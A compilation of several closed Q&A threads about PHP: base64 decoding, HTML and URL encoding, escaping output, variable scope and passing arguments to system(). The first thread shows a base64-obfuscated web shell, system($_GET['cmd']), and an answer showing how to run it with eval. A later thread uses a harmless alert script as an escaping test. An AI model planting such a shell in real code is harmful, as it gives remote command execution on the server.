Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 6 years ago.
Improve this question
I'm trying to Test script
I want to run system function inside base64 decode function
But it doesn't work any idea !
<?php base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSkg")
?>
localhost/test.php?cmd=id
PHP's base64_decode function gets a string (which is encoded in base64) and decode it back to the original data. The function then returns the decoded data as string, which means your code actually looks like:
<?php "system($_GET['cmd']) "
?>
(Running this code makes no sense).
If you want to PHP to "run" (or Evaluate) the string that you juse decoded - you should use the php's eval language construct:
<?php eval("system($_GET['cmd']);");
?>
Note the ; added in the end of the string (inside the eval call).
Very important
Note that the use of eval is very dangerous because it allows execution of arbitrary code.
You should really NOT use it unless you REALLY know what you are doing.
Related
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I attempted encoding a '=' symbol to its html equivalent through the use of:
htmlentities("This is my test and it = this");
The result is:
<p>This is my test and it = this</p>1
Notice how the equals sign is not encoded? I know there is a HTML equivalent.
What is an alternative function I can use to encode this string?
Thanks.
I know there is a HTML equivalent
The equals sign isn't encoded for HTML, there is no reason to do so.
You might be thinking of URL-encoding, which would be %3d:
urlencode("This is my test and it = this");
// => "This+is+my+test+and+it+%3D+this"
There's no need to encode the =; it's HTML-safe. If you really want to, though: =
echo str_replace('=', '=', htmlentities("This is my test and it = this"));
Demo
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
I have tried to pass a variable trough url... its %50.
I am doing urlencoding to pass other languages through the url.
At that time %50 also been converted to a space or something else.
Can anyone help me to find out a way to send %50 as a variable through urlencoded link(url).
<?php
$string = '%50';
echo $encoded = urlencode($string);
// returns %2550
echo urldecode($encoded);
// returns %50
?>
So if you want to pass $string to a url you write something like:
http://yoursite.com/script.php?string=$encoded
To get your original string value you can just use $_GET in your script.php:
echo $_GET["string"];
// returns %50
Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 9 years ago.
Improve this question
I have a very simple php script designed to test the function htmlspecialchars:
$question="<script>alert('hacked')</script>";
echo "<br>original question=",$question;
$question = make_secure( $question );
echo "<br>converted question=",$question;
echo "<br>converted question calling htmlspecialchars=",htmlspecialchars($question);
function make_secure($data) {
$data = htmlspecialchars($data); return $data; }
It should remove the special chars from the original string $question by calling a function with htmlspecialchars inside it. However, the function does not seem remove the special chars. They are only removed if I call htmlspecialchars explicitly in the script. Why?
Thanks.
EDIT: This is what I see when I run the script:
original question=
converted question=<script>alert('hacked')</script>
converted question calling htmlspecialchars=<script>alert('hacked')</script>
(the 'hacked' script is also executed first). To rephrase my question, why is the script still perfectly visible in $question on line line converted question= ? i.e. why hasn't the variable been converted? I thought that after the variable had been converted, the script should no longer be visible.
The output visible to the user should be:
(nothing, script executed)
<script>alert('hacked')</script>
<script>alert('hacked')</script>
The actual output, visible to the browser is:
<script>alert('hacked')</script>
<script>alert('hacked')</script>
<script>alert('hacked')</script>
Which is exactly correct. The first line is unescaped, the HTML and script get interpreted. The second line is escaped once, displaying the text as is to the user. The third line is escaped twice, displaying the text as escaped once to the user.
You keep escaping the same variable over and over, so the result is going to change depending on how often you escape it. Maybe start here: The Great Escapism (Or: What You Need To Know To Work With Text Within Text)
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 9 years ago.
Improve this question
Is it possible to have use a php variable in multiple positions in the code? For example
<?php
some code here with a certain variable called var
?>
some html code
<h3> <?php $echo $var ?> <h3>
Yes! PHP is wonderful that way. I like to think of it as an overlay on top of my HTML code that simply acts when I tell it to. You can test it for yourself and see - that's the best way to learn :)
This works fine:
<?php
$a = "hello world!";
?>
<h3> <?php echo $a ?> <h3>
If a file is being interpreted as a PHP script you may think of it as a entire piece of code, the HTML code between scripts works like a echo. So, if you declare a variable in any part of the script, if it is on the global scope, it is available for each of the scripts declared. Just be careful with the scopes where you declare de variables. If you declare a variable inside a function, it will be available inside the function.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
i writing a PHP script that call a file in the server
by using :
<?php
$ret=system("command");
?>
the problem is when the file need some parameters
i can't find a way of doing that
because when using
<?php
$ret=system("command");
?>
the PHP skips that part of asking for variables
and assign to id a random one
and i can't pass theme at the start like
$ret = system("command argument1 argument2 argument3...");
beause the nmber of parametres depend on the user
i mean he keep entring data to a dynamic array entill he enter"end"
$ret = system("command argument1 argument2 argument3...");
Just load the arguments on, just like you were calling the program from a command line.
$cmd = "cmd param1 param2";
system($cmd,$return_value);
($return_value == 0) or die("returned an error: $cmd");
If what you mean is that you have an array that can have any number of parameters use this:
$commandParameters = implode(" ",$dynamicArray);
$ret = system("command ".escapeshellarg($commandParameters));
Get the parameters from the user via. HTML form and then, when you know what (and how many) the parameters are - you can use "system()" like everyone suggested!